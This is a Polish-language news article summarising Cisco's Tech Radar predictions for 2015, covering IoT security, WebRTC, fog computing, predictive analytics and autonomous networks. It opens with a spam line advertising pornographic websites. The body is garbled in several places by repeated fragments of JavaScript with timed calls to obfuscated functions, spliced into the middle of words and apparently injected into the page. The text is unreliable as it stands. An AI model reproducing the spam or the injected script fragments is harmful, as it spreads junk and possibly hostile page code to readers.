check this link right here now kamuktahd.net black girl riding shaft. check this link right here nowmalayalam kambi tamilsexstories

Cisco: prognozy na 2015 rok

Cisco przedstawiło wyniki najnowszego badania Tech Radar, przeprowadzonego przez ponad 80 ekspertów, identyfikujących pojawiające się trendy technologiczne i przewidujących ich wpływ na biznes, rządy i codzienne życie społeczeństw w perspektywie pięciu, dziesięciu, a nawet dwudziestu pięciu lat.

W ciągu ostatnich lat, zespół przygotowujący Cisco Tech Radar przeanalizował ponad 250 trendów, zaś obecnie skupia się na 90-100, z których sześć uznaje za szczególnie istotne.

1. Zmiana jest jedyną stałą w świecie IT, a IT jest wszędzie

Prognoza:

 • W ciągu najbliższej dekady granice poszczególnych branż będą zacierać się, a firmy IT będą coraz częściej nawiązywać współpracę, inwestować i przejmować firmy spoza swojego sektora. Innowacje w ICT przenikają do innych dziedzin, takich jak służba zdrowia, motoryzacja, automatyka czy lotnictwo.

2. Standom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andard WebRTC zdefiniuje przyszłe sposoby pracy

Prognoza:

 • W USA do roku 2020 niemal połowę czynnych zawodowo osób stanowić będą przedstawiciele Pokolenia Y, którzy wniosą do miejsca pracy zupełnie nowe sposoby komunikacji (m.in. social media), zakładające konieczność ciągłego dostępu do sieci.
 • Wzrośnie liczba freelancerów i pracowników mobilnych, co postawi firmy przed koniecznością dostosowania narzędzi pracy do tego trendu.
 • Wideokonferencje, komunikatory czy korporacyjne portale społecznościowe staną się normą w sytuacji, gdy coraz częściej w dużych firmach zespoły składają się z pracowników znajdujących się w rozproszonych lokalizacjach.

3. Internet Rzeczy a bezpieczeństwo IT

Prognoza:

 • W ciągu najbliższych 2 do 5 lat bezpieczeństwo IT rozciągnie się na zupełnie nowe modele zastosowania, jak choćby automatyka przemysłowa. Podejście do bezpieczeństwa IT będzie przesuwać się od działania jedynie w modelu zapobiegawczym do modelu zapewniającego bezpieczeństwo w całym kontinuum zagrożeń, a więc przed, w trakcie i po ataku.
 • W roku 2015 będziemy mogli korzystać z narzędzi bardzo dokładnie monitorujących stan sieci i w ten sposób przewidywać ewentualne ataki.
 • Do roku 2022 rozwiązania bezpieczeństwa będą podstawą wartego 5,2 bln dolarów rynku Internetu Rzeczy, który przyniesie dziesiątki nowych platform, setki wariacji, jeśli chodzi o możliwości integracji różnych przedmiotów z siecią, nowe standom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andardy w niemal każdej branży i nowy sposób postrzegania aplikacji. Stworzy to zupełnie nowe wyzwania jeśli chodzi o architekturę bezpieczeństwa. Liderzy IT będą musieli dostosować się do różnic w tych nowych obszarach technologii i rozwijać wielostronne podejście do ryzyka i bezpieczeństwa. Najnowsze patenty Cisco czy konkursy takie jak Cisco IoT Security Grandom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}and Challenge potwierdzają, że obrona przed zagrożeniami i ochrona prywatności będą centralnym punktem tych działań.

4. Fog computing i analityka w czasie rzeczywistym

Prognoza:

 • W nadchodzącej epoce Internetu Wszechrzeczy wzrośnie znaczenie analizy w czasie rzeczywistym, szczególnie na brzegach sieci.
 • Big Data jest niczym bez analizy i oceny danych. Jednak aby analiza była przydatna, jej wyniki muszą być dostarczane zainteresowanym osobom w czasie rzeczywistym. Wymagana do tego jest bezpieczna i świadoma kontekstu sieć, przewidująca zmiany otoczenia i reagująca na nie.
 • Inwestycje venture capital w sektor analityki w czasie rzeczywistym wzrosną ponad czterokrotnie w ciągu najbliższych 4 lat. Małe start-upy przewodzą fali innowacji w tym obszarze, obejmującym całą gamę rozwiązań – od aplikacji dla graczy komputerowych po zaawansowane narzędzia do analizy danych z pól naftowych czy oceny ryzyka cyberzagrożeń.
 • Niezawodna komunikacja nie zawsze będzie możliwa, np. z powodu przeciążenia sieci lub po prostu złej jakości połączeń. Słabe połączenia sieciowe są problemem szczególnie dla urządzeń bezprzewodowych krótkiego zasięgu. Wdrożenia sieci bezprzewodowych, łączących rozproszone geograficznie czujniki i umożliwiających wysyłanie gromadzonych przez nie danych w czasie rzeczywistym do chmury, mogą kosztować miliardy. Z drugiej strony, pewne rodzaje podłączonych urządzeń, np. służących do zdalnego monitorowania stanu zdrowia, wymagają bardzo niskich opóźnień. Wysyłanie danych do chmury i z powrotem do aplikacji może mieć negatywny wpływ na działanie tych usług.
 • Fog computing rozwiązuje te problemy, zapewniając zasoby obliczeniowe, sieciowe i pamięć masową na brzegu sieci. Oferuje inteligentną platformę do zarządzania rozproszoną infrastrukturą Internetu Rzeczy w czasie rzeczywistym. Rozwój fog computingu doprowadzi do powstania nowych modeli biznesowych i możliwości dla operatorów sieci.

5. Kontekstowa analiza predykcyjna

Prognoza:

 • W ciągu najbliższych 4 lat kontekstowa analiza predykcyjna stanie się jedną z głównych kategorii na rynku aplikacji.
 • Rozpoznawanie aktywności i lokalizacji użytkownika napędzają rozwój kontekstowej analizy predykcyjnej – innowacje skoncentrują się głównie na branży transportowej i handom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andlu detalicznym.

6. Uproszczenie sieci

Prognoza:

 • W sytuacji, gdy w roku 2018 do sieci podłączonych będzie 20 miliardów urządzeń, fundamentalne staje się zapewnienie autonomii działania łączących je sieci.
 • Autonomiczne, samoorganizujące się sieci są konieczne, aby wspierać komunikację całej palety urządzeń tworzących Internet Wszechrzeczy. Liczba połączeń M2M (machine-to-machine) zrówna się w roku 2018 z populacją świata i wyniesie 7,3 mld, co stanowić będzie 35% wszystkich połączonych z siecią urządzeń (20 mld).

źródło: www.cisco.com